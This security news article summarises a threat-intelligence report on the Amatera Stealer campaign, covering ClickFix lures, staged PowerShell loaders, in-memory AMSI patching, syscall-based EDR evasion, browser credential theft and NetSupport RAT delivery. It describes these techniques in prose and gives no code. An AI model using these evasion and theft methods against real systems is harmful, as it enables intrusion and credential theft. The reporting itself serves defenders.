Amatera Stealer Campaign Uses ClickFix to Deploy Malware, Bypassing EDR by Patching AMSI in Memory
Do Son 
ClickFix initial access vector | Image: TRU
eSentire’s Threat Response Unit (TRU) has uncovered a widespread malware operation leveraging a deceptive social-engineering technique known as ClickFix to deliver a newly rebranded version of the ACR (AcridRain) Stealer, now renamed Amatera Stealer, alongside the widely abused NetSupport RAT.
This campaign combines aggressive social manipulation, multi-stage PowerShell payloads, advanced AMSI evasion, and high-end credential theft capabilities.
Amatera Stealer is not a new creation—it is a more polished and more dangerous version of the AcridRain (ACR) Stealer, whose source code was sold in 2024.
TRU highlights, “Analysis revealed that Amatera Stealer is a rebranded iteration of ACR (AcridRain) Stealer… previously marketed as Malware-as-a-Service (MaaS) on underground forums by the threat actor SheldIO.”
After SheldIO discontinued commercial sales and sold the source code, multiple threat actors appear to have adopted or modified the malware for new campaigns.
Amatera’s capabilities are extensive. TRU writes that it “provides threat actors with extensive data exfiltration capabilities targeting crypto-wallets, browsers, messaging applications, FTP clients, and email services.”
This makes it directly comparable to popular high-end stealers like Lumma, Meduza, RedLine, and Vidar.
The attack starts with a powerful social-engineering trick. eSentire explains that “attackers initially compromise victims through social engineering via the ClickFix initial access vector, compelling them to execute malicious commands in the Windows Run Prompt.”
Victims are often convinced to “fix” a fake software error by running commands provided by the attacker—likely under the guise of IT support, installation troubleshooting, or urgent warning pop-ups.
Executing the command triggers the download of the first PowerShell stage, beginning the infection chain. The PowerShell chain used in this campaign is unusually intricate and demonstrates advanced detection evasion techniques.
TRU notes that earlier stages are “typical obfuscated PowerShell code,” but they hide critical innovations. One stage decrypts the next payload using XOR against the misleading string “AMSI_RESULT_NOT_DETECTED”:
“The string itself is defined as an Enum for the Anti-Malware Scan Interface (AMSI)… and was chosen by the loader developer(s) simply to confuse researchers.”
The next stage goes further, directly patching Windows security functions in memory:
“The code first finds where clr.dll is loaded… and overwrites the substring ‘AmsiScanBuffer’ with null bytes.”
By corrupting AMSI’s memory references, the malware prevents Windows from scanning the contents of future malicious scripts—allowing stealthy execution of all subsequent PowerShell stages.
The report reveals that one of the campaign’s final loader stages is a heavily obfuscated .NET downloader:
“Incidents involve the use of a .NET-based downloader that is packed with Agile.net and downloads an encrypted payload from MediaFire, decrypts it via RC2, and invokes the next stage.”
The next stage is a Pure Crypter-packed DLL, which proceeds to unpack and execute Amatera Stealer.
Pure Crypter is a well-known commercially sold malware loader associated with numerous credential theft incidents, raising the sophistication of this attack chain even further.
Once installed, Amatera activates an enormous range of harvesting capabilities targeting:
- Browsers (Chrome, Firefox, Edge, Opera, Vivaldi, Brave, etc.)
- 149+ cryptocurrency browser extensions
- 43+ password managers
- Desktop wallets (Bitcoin, Litecoin, Zcash, Dogecoin, Exodus, Binance, etc.)
- FTP/email/VPN clients
- Sticky Notes, Notezilla, To-Do lists, and other productivity apps
TRU emphasizes the technical complexity of its sandbox evasion:
“Amatera employs advanced evasion techniques such as WoW64 SysCalls to circumvent user-mode hooking mechanisms commonly used by sandboxes, Anti-Virus solutions, and EDR products.”
Notably, Amatera can also bypass “App-Bound Encryption” in Chrome and Edge through COM-based injection—allowing it to extract decrypted credentials that should otherwise be secured.
The stealer uses multiple layers of encryption and system calls to hide communications:
- AES-256-CBC data encryption
- Encrypted C2 address hidden as base64 + XOR cipher
- TLS-wrapped communications using Windows security APIs
- Use of NtDeviceIoControl via WoW64 syscalls to bypass security hooks
- Bogus Host header values to mislead defenders
The report states:
“Amatera communicates with the C2 over TLS… using an advanced technique that is used to evade security solutions that hook specific Windows APIs for inspection.”
Exfiltrated data is zipped and transmitted via HTTP POST in encrypted archives, each containing a unique victim fingerprint.
One of Amatera’s most damaging functions is its ability to deploy follow-on malware through its “load” feature. TRU states:
“Amatera delivering additional malware like NetSupport RAT through the ‘ld’ or ‘load’ feature… enabling fileless or file-based payload execution.”
If the configuration instructs a fileless execution, Amatera uses PowerShell:
The NetSupport payload is hidden inside a malicious JPG file, decrypted in memory, unzipped, and executed under the name systeminfo.exe.
Even more concerning, eSentire discovered that:
“The NSM.lic file had licensee ‘KAKAN’, a NetSupport cluster… observed in prior incidents.”
This ties the campaign to earlier NetSupport-abuse operations, confirming ongoing tool reuse by known threat actors.
Related Posts:
- Amatera Stealer Unveiled: Rebranded ACR Stealer Now More Evasive, Targeting Your Data
- New Phishing Campaign Impersonates Ukrainian Police to Deliver Amatera Stealer and PureMiner
- Microsoft Enhances Exchange and SharePoint Security with AMSI Integration
- With null characters, Malicious code bypassed security checking in Windows 10
- XWorm 6.0: New Variant Uses AMSI Bypass & Critical Process Trick to Evade Detection and Crash Systems
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
